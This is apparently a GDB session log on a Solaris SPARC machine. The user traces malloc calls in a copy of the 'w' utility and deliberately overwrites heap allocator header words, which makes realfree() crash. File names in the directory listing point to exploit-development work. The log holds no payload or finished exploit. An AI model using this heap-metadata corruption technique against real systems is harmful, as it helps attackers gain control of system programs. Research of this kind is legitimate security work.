0x35720:        0x00000000      0x00000000      0x00000000      0x00000000
0x35730:        0x00000000      0x00000000      0x00000000      0x00000000
0x35740:        0x00000000      0x00000000      0x00000000      0x00000000
0x35750:        0x00000000      0x00000000      0x00000000      0x00000000
0x35760:        0x00000000      0x00000000      0x00000000      0x00000000
0x35770:        0x00000000      0x00000000      0x00000000      0x00000000
0x35780:        0x00000000      0x00000000      0x00000000      0x00000000
0x35790:        0x00000000      0x00000000      0x00000000      0x00000000
0x357a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x357b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x357c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x357d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x357e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x357f0:        0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
0x35800:        0x00000000      0x00000000      0x00000000      0x00000000
0x35810:        0x00000000      0x00000000      0x00000000      0x00000000
0x35820:        0x00000000      0x00000000      0x00000000      0x00000000
0x35830:        0x00000000      0x00000000      0x00000000      0x00000000
0x35840:        0x00000000      0x00000000      0x00000000      0x00000000
0x35850:        0x00000000      0x00000000      0x00000000      0x00000000
0x35860:        0x00000000      0x00000000      0x00000000      0x00000000
0x35870:        0x00000000      0x00000000      0x00000000      0x00000000
0x35880:        0x00000000      0x00000000      0x00000000      0x00000000
0x35890:        0x00000000      0x00000000      0x00000000      0x00000000
0x358a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x358b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x358c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x358d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x358e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x358f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35900:        0x00000000      0x00000000      0x00000000      0x00000000
0x35910:        0x00000000      0x00000000      0x00000000      0x00000000
0x35920:        0x00000000      0x00000000      0x00000000      0x00000000
0x35930:        0x00000000      0x00000000      0x00000000      0x00000000
0x35940:        0x00000000      0x00000000      0x00035030      0x00000000
0x35950:        0x00000003      0x00000000      0x00000000      0x00000000
0x35960:        0x00000000      0x00000000      0x00000000      0x00000000
0x35970:        0x00000000      0x00000000      0x00000000      0x00000000
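## note: the dump above shows 0x35948 holding 0x00035030; this write changes only its top byte (0x00 -> 0x41).
## The run that follows still prints the normal output and exits cleanly, so this word does not appear to be consulted on this path.
(gdb) set *0x35948=0x41035030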
(gdb) c
Continuing.
bazz     pts/1         5:10pm    24                /home/bazz/w_32
bazz     pts/2         7:23pm     2                /home/bazz/w_32
bazz     pts/3         7:34pm                      /home/bazz/w_32 -h

Program exited normally.
(gdb) r -h
Starting program: /home/bazz/w_32 -h
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) b _malloc_unlocked
Breakpoint 2 at 0xff2c1dc8
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0xff2ca560 in opendir () from /usr/lib/libc.so.1
#3  0x000113d0 in main ()
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0x00011cf0 in main ()
#3  0x000114e0 in main ()
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0x00011cf0 in main ()
#3  0x00011784 in main ()
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0x00011cf0 in main ()
#3  0x000114e0 in main ()
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0x00011cf0 in main ()
#3  0x000114e0 in main ()
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0xff2d38b0 in tzcpy () from /usr/lib/libc.so.1
#3  0xff2d37f8 in getzname () from /usr/lib/libc.so.1
#4  0xff2d32fc in _ltzset_u () from /usr/lib/libc.so.1
#5  0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#6  0x00011e8c in main ()
#7  0x0001186c in main ()
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0xff2b624c in calloc () from /usr/lib/libc.so.1
#3  0xff2d4a4c in _tzload () from /usr/lib/libc.so.1
#4  0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#5  0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#6  0x00011e8c in main ()
#7  0x0001186c in main ()
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0xff2b624c in calloc () from /usr/lib/libc.so.1
#3  0xff2d4ce8 in _tzload () from /usr/lib/libc.so.1
#4  0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#5  0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#6  0x00011e8c in main ()
#7  0x0001186c in main ()
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0xff2b624c in calloc () from /usr/lib/libc.so.1
#3  0xff2d4d08 in _tzload () from /usr/lib/libc.so.1
#4  0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#5  0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#6  0x00011e8c in main ()
#7  0x0001186c in main ()
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0xff2b624c in calloc () from /usr/lib/libc.so.1
#3  0xff2d4d30 in _tzload () from /usr/lib/libc.so.1
#4  0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#5  0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#6  0x00011e8c in main ()
#7  0x0001186c in main ()
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0xff2b624c in calloc () from /usr/lib/libc.so.1
#3  0xff2d4db4 in _tzload () from /usr/lib/libc.so.1
#4  0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#5  0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#6  0x00011e8c in main ()
#7  0x0001186c in main ()
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.
bazz     pts/1         5:10pm    25                /home/bazz/w_32

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.
bazz     pts/2         7:23pm     3                /home/bazz/w_32

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Continuing.
bazz     pts/3         7:34pm                      /home/bazz/w_32 -h

Program exited normally.
(gdb)
The program is not being run.
(gdb)
The program is not being run.
(gdb)
The program is not being run.
(gdb)
The program is not being run.
(gdb)
The program is not being run.
(gdb)
The program is not being run.
(gdb)
The program is not being run.
(gdb) del 2
(gdb) r -h fooo
Starting program: /home/bazz/w_32 -h fooo
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) c
Continuing.

Program exited normally.
(gdb) r -h fooo
Starting program: /home/bazz/w_32 -h fooo
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35948=0x41035030
(gdb) c
Continuing.

Program exited normally.
(gdb) r -h fooo
Starting program: /home/bazz/w_32 -h fooo
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) b _malloc_unlocked
Breakpoint 3 at 0xff2c1dc8
(gdb) c
Continuing.

Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0xff2ca560 in opendir () from /usr/lib/libc.so.1
#3  0x000113d0 in main ()
(gdb) c
Continuing.

Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0x00011cf0 in main ()
#3  0x000114e0 in main ()
(gdb) c
Continuing.

Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0x00011cf0 in main ()
#3  0x00011784 in main ()
(gdb) c
Continuing.

Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0x00011cf0 in main ()
#3  0x000114e0 in main ()
(gdb) c
Continuing.

Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0x00011cf0 in main ()
#3  0x000114e0 in main ()
(gdb) c
Continuing.

Program exited normally.
(gdb) r -h fooo
Starting program: /home/bazz/w_32 -h fooo
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.

Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1d24 in _smalloc () from /usr/lib/libc.so.1
#2  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#3  0xff2b624c in calloc () from /usr/lib/libc.so.1
#4  0xff2fabb4 in textdomain () from /usr/lib/libc.so.1
#5  0x00010ee8 in main ()
(gdb) c
Continuing.

Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0xff2fc22c in _textdomain_u () from /usr/lib/libc.so.1
#3  0xff2fabec in textdomain () from /usr/lib/libc.so.1
#4  0x00010ee8 in main ()
(gdb) c
Continuing.

Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1d24 in _smalloc () from /usr/lib/libc.so.1
#2  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#3  0xff2fc22c in _textdomain_u () from /usr/lib/libc.so.1
#4  0xff2fabec in textdomain () from /usr/lib/libc.so.1
#5  0x00010ee8 in main ()
(gdb) c
Continuing.

Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0x000110b4 in main ()
(gdb) c
Continuing.

Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0xff30f22c in _findbuf () from /usr/lib/libc.so.1
#3  0xff30f0e0 in _filbuf () from /usr/lib/libc.so.1
#4  0xff312cf8 in fread () from /usr/lib/libc.so.1
#5  0xff2bd91c in getutxent_frec () from /usr/lib/libc.so.1
#6  0xff2bd9c4 in getutxent () from /usr/lib/libc.so.1
#7  0x000110dc in main ()
(gdb) c
Continuing.

Breakpoint 1, 0x00011114 in main ()
(gdb) bt
#0  0x00011114 in main ()
(gdb) c
Continuing.

Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0xff2ca560 in opendir () from /usr/lib/libc.so.1
#3  0x000113d0 in main ()
(gdb) p/x $i0
$1 = 0x428
(gdb) x/x &Lfree
0xff34284c <Lfree>:     0x00033028
(gdb) x/x &Root
0xff342858 <Root>:      0x00000000
(gdb) x/x 0x00033028
0x33028:        0x00000000
(gdb) x/x 0x00033028-8
0x33020:        0x00002009
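## note: 0x33020 is the word 8 bytes below the address stored in Lfree (0x33028) and held 0x00002009 -- presumably the allocator's header/size word for that block (not confirmed here).
## Only the top byte is changed; the SIGSEGV inside realfree() right after is the visible symptom of the allocator reading the altered header.
(gdb) set *0x00033020=0x40002009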
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xff2c247c in realfree () from /usr/lib/libc.so.1
(gdb) i b
Num Type           Disp Enb Address    What
1   breakpoint     keep y   0x00011114 <main+592>
        breakpoint already hit 1 time
3   breakpoint     keep y   0xff2c1dc8 <_malloc_unlocked+4>
        breakpoint already hit 7 times
(gdb) del 3
(gdb) r -j foo
The program being debugged has been started already.
Start it from the beginning? (y or n) n
Program not restarted.
(gdb) r -h foo
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32 -h foo
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) b _malloc_unlocked
Breakpoint 4 at 0xff2c1dc8
(gdb) c
Continuing.

Breakpoint 4, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0xff2ca560 in opendir () from /usr/lib/libc.so.1
#3  0x000113d0 in main ()
(gdb) x/x 0x00033028-8
0x33020:        0x00002009
(gdb) x/x 0x00033028-12
0x3301c:        0x00000000
(gdb) x/x 0x00033028-116
0x32fb4:        0x00000000
(gdb) x/x 0x00033028-16
0x33018:        0x00000000
(gdb) x/96x 0x33028
0x33028:        0x00000000      0x00000000      0x00000000      0x00000000
0x33038:        0x00000000      0x00000000      0x00000000      0x732f3136
0x33048:        0x7074732f      0x31360000      0x00000000      0x00000000
0x33058:        0x00000000      0x00000000      0x00000000      0x00000000
0x33068:        0x000014fd      0x00080000      0x00000000      0x52526920
0x33078:        0x00082de6      0x00000000      0x00000000      0x00000000
0x33088:        0x00000000      0x00000000      0x00000000      0x00000000
0x33098:        0x00000000      0x00000000      0x00000000      0x00000000
0x330a8:        0x00000000      0x00000000      0x00000000      0x00000000
0x330b8:        0x00000000      0x00000000      0x00000000      0x00000000
0x330c8:        0x00000000      0x00000000      0x00000000      0x00000000
0x330d8:        0x00000000      0x00000000      0x00000000      0x00000000
0x330e8:        0x00000000      0x00000000      0x00000000      0x00000000
0x330f8:        0x00000000      0x00000000      0x00000000      0x00000000
0x33108:        0x00000000      0x00000000      0x00000000      0x00000000
0x33118:        0x00000000      0x00000000      0x00000000      0x00000000
0x33128:        0x00000000      0x00000000      0x00000000      0x00000000
0x33138:        0x00000000      0x00000000      0x00000000      0x00000000
0x33148:        0x00000000      0x00000000      0x00000000      0x00000000
0x33158:        0x00000000      0x00000000      0x00000000      0x00000000
0x33168:        0x00000000      0x00000000      0x00000000      0x00000000
0x33178:        0x00000000      0x00000000      0x00000000      0x00000000
0x33188:        0x00000000      0x00000000      0x00000000      0x0000002f
0x33198:        0x62617a7a      0x00000000      0x00000000      0x00000000
(gdb) x/96x 0x33000
0x33000:        0x00000000      0x00000000      0x00000000      0x00000000
0x33010:        0x00000000      0x00000000      0x00000000      0x00000000
0x33020:        0x00002009      0x00000000      0x00000000      0x00000000
0x33030:        0x00000000      0x00000000      0x00000000      0x00000000
0x33040:        0x00000000      0x732f3136      0x7074732f      0x31360000
0x33050:        0x00000000      0x00000000      0x00000000      0x00000000
0x33060:        0x00000000      0x00000000      0x000014fd      0x00080000
0x33070:        0x00000000      0x52526920      0x00082de6      0x00000000
0x33080:        0x00000000      0x00000000      0x00000000      0x00000000
0x33090:        0x00000000      0x00000000      0x00000000      0x00000000
0x330a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33100:        0x00000000      0x00000000      0x00000000      0x00000000
0x33110:        0x00000000      0x00000000      0x00000000      0x00000000
0x33120:        0x00000000      0x00000000      0x00000000      0x00000000
0x33130:        0x00000000      0x00000000      0x00000000      0x00000000
0x33140:        0x00000000      0x00000000      0x00000000      0x00000000
0x33150:        0x00000000      0x00000000      0x00000000      0x00000000
0x33160:        0x00000000      0x00000000      0x00000000      0x00000000
0x33170:        0x00000000      0x00000000      0x00000000      0x00000000
(gdb) x/s 0x33044
0x33044:         "s/16pts/16"
(gdb) q
The program is running.  Exit anyway? (y or n) y
bazz@blade72[pts/3][~] ls
11111111               blade60_libc.so.1  getrsp.c             o064                test
C_aps                  bp2                latest               o0o0                test.S
Desktop                carduino-server.c  loader               perl5               test1
Diagnostics            chmod.sh           local                pjsip               tools
Documents              core               mail                 port.h              umb-scheme-3.2.tar.gz
Downloads              count_lines        make_shellcode.c     public_html         utmp_update
How_to_print_Lj2.html  cs444              man                  public_html_backup  utmpx.c
IMG_0985.JPG           dead.letter        man2ps.sh            scheme-3.2          utmpx_userspace.c
Pictures               derp               mbox                 send                w_32
Projects               derp.c             meatball             send.c              w_64
Templates              derp.xcf           menu_toggle          shellshock_test.sh  write.S
Ubuntu One             find_libc          mkill                showrev-p.out       write.c
Videos                 find_libc.c        my_own_heap_exploit  sketchbook          write.man
a.out                  find_libc_exit     mywrite              src                 write_selfcontained
apply_actual           find_write_libc.c  namefs               superstar           write_selfcontained.S
bin                    find_write_libc2   nat.gif              temp.bin            writed
bintos.c               getrsp             nobackup             temp.o
bazz@blade72[pts/3][~] cp tools/tmp/invoke .
bazz@blade72[pts/3][~] $PWD/invoke -d w_32
OPTIND is 1
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(no debugging symbols found)...
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symb  7:44pm  up 595 day(s),  5:53,  3 users,  load average: 0.01, 0.01, 0.01
User     tty           login@  idle   JCPU   PCPU  what
bazz     pts/1         5:10pm    32                /home/bazz/w_32
bazz     pts/2         7:23pm    10                /home/bazz/w_32
bazz     pts/3         7:34pm            1         /home/bazz/w_32
ols found)...
Program exited normally.
(gdb) r -h foo
Starting program: /home/bazz/w_32 -h foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Program exited normally.
(gdb) b 0x11114
Function "0x11114" not defined.
(gdb) b *0x11114
Breakpoint 1 at 0x11114
(gdb) r -h foo
Starting program: /home/bazz/w_32 -h foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) x/4i $pc
0x11114 <main+592>:     sethi  %hi(0x22800), %o0
0x11118 <main+596>:     mov  %i4, %l1
0x1111c <main+600>:     add  %o0, 0x1e8, %i0
0x11120 <main+604>:     call  0x22514 <time>
(gdb) x/4i $pc-8
0x1110c <main+584>:     call  0x22508 <endutxent>
0x11110 <main+588>:     nop
0x11114 <main+592>:     sethi  %hi(0x22800), %o0
0x11118 <main+596>:     mov  %i4, %l1
(gdb) x/96x 0x34000
0x34000:        0x00000000      0x00000000      0x00000000      0x00000000
0x34010:        0x00000000      0x00000000      0x00000000      0x00000000
0x34020:        0x00000000      0x00000000      0x62617a7a      0x00000000
0x34030:        0x00000000      0x00000000      0x00000000      0x00000000
0x34040:        0x00000000      0x00000000      0x74732f35      0x7074732f
0x34050:        0x35000000      0x00000000      0x00000000      0x00000000
0x34060:        0x00000000      0x00000000      0x00000000      0x00007467
0x34070:        0x00080000      0x00000000      0x544b6439      0x0001fa71
0x34080:        0x00000000      0x00000000      0x00000000      0x00000000
0x34090:        0x00000000      0x00000000      0x00000000      0x00000000
0x340a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x340f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x34100:        0x00000000      0x00000000      0x00000000      0x00000000
0x34110:        0x00000000      0x00000000      0x00000000      0x00000000
0x34120:        0x00000000      0x00000000      0x00000000      0x00000000
0x34130:        0x00000000      0x00000000      0x00000000      0x00000000
0x34140:        0x00000000      0x00000000      0x00000000      0x00000000
0x34150:        0x00000000      0x00000000      0x00000000      0x00000000
0x34160:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/96x 0x33000
0x33000:        0x00000000      0x00000000      0x00000000      0x00000000
0x33010:        0x00000000      0x00000000      0x00000000      0x00000000
0x33020:        0x00002009      0x00000000      0x00000000      0x00000000
0x33030:        0x00000000      0x00000000      0x00000000      0x00000000
0x33040:        0x00000000      0x732f3136      0x7074732f      0x31360000
0x33050:        0x00000000      0x00000000      0x00000000      0x00000000
0x33060:        0x00000000      0x00000000      0x000014fd      0x00080000
0x33070:        0x00000000      0x52526920      0x00082de6      0x00000000
0x33080:        0x00000000      0x00000000      0x00000000      0x00000000
0x33090:        0x00000000      0x00000000      0x00000000      0x00000000
0x330a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33100:        0x00000000      0x00000000      0x00000000      0x00000000
0x33110:        0x00000000      0x00000000      0x00000000      0x00000000
0x33120:        0x00000000      0x00000000      0x00000000      0x00000000
0x33130:        0x00000000      0x00000000      0x00000000      0x00000000
0x33140:        0x00000000      0x00000000      0x00000000      0x00000000
0x33150:        0x00000000      0x00000000      0x00000000      0x00000000
0x33160:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x33170:        0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
(gdb)
(gdb) x/96000x 0x33000
0x33000:        0x00000000      0x00000000      0x00000000      0x00000000
0x33010:        0x00000000      0x00000000      0x00000000      0x00000000
0x33020:        0x00002009      0x00000000      0x00000000      0x00000000
0x33030:        0x00000000      0x00000000      0x00000000      0x00000000
0x33040:        0x00000000      0x732f3136      0x7074732f      0x31360000
0x33050:        0x00000000      0x00000000      0x00000000      0x00000000
0x33060:        0x00000000      0x00000000      0x000014fd      0x00080000
0x33070:        0x00000000      0x52526920      0x00082de6      0x00000000
0x33080:        0x00000000      0x00000000      0x00000000      0x00000000
0x33090:        0x00000000      0x00000000      0x00000000      0x00000000
0x330a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x330f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33100:        0x00000000      0x00000000      0x00000000      0x00000000
0x33110:        0x00000000      0x00000000      0x00000000      0x00000000
0x33120:        0x00000000      0x00000000      0x00000000      0x00000000
0x33130:        0x00000000      0x00000000      0x00000000      0x00000000
0x33140:        0x00000000      0x00000000      0x00000000      0x00000000
0x33150:        0x00000000      0x00000000      0x00000000      0x00000000
0x33160:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x33170:        0x00000000      0x00000000      0x00000000      0x00000000
0x33180:        0x00000000      0x00000000      0x00000000      0x00000000
0x33190:        0x00000000      0x0000002f      0x62617a7a      0x00000000
0x331a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x331b0:        0x00000000      0x00000000      0x72313030      0x7074732f
0x331c0:        0x34000000      0x00000000      0x00000000      0x00000000
0x331d0:        0x00000000      0x00000000      0x00000000      0x000056cb
0x331e0:        0x00080000      0x00000ba1      0x5440c4dc      0x00000000
0x331f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x33200:        0x00000000      0x00000000      0x000a6c6f      0x63616c68
0x33210:        0x6f737400      0x00000000      0x00000000      0x00000000
0x33220:        0x00000000      0x00000000      0x00000000      0x00000000
0x33230:        0x00000000      0x00000000      0x00000000      0x00000000
0x33240:        0x00000000      0x00000000      0x00000000      0x00000000
0x33250:        0x00000000      0x00000000      0x00000000      0x00000000
0x33260:        0x00000000      0x00000000      0x00000000      0x00000000
0x33270:        0x00000000      0x00000000      0x00000000      0x00000000
0x33280:        0x00000000      0x00000000      0x00000000      0x00000000
0x33290:        0x00000000      0x00000000      0x00000000      0x00000000
0x332a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x332b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x332c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x332d0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x332e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x332f0:        0x00000000      0x00000000      0x00000000      0x00000000
